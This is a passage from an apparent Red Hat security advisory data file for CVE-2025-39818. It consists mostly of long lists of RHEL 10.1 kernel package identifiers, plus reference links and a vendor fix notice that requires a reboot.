"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-39818"
},
{
"category": "external",
"summary": "RHBZ#2395797",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395797"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-39818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39818"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-39818",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-39818"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025091615-CVE-2025-39818-f1b9@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025091615-CVE-2025-39818-f1b9@gregkh/T"
}
],
"release_date": "2025-09-16T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-09T10:02:53+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
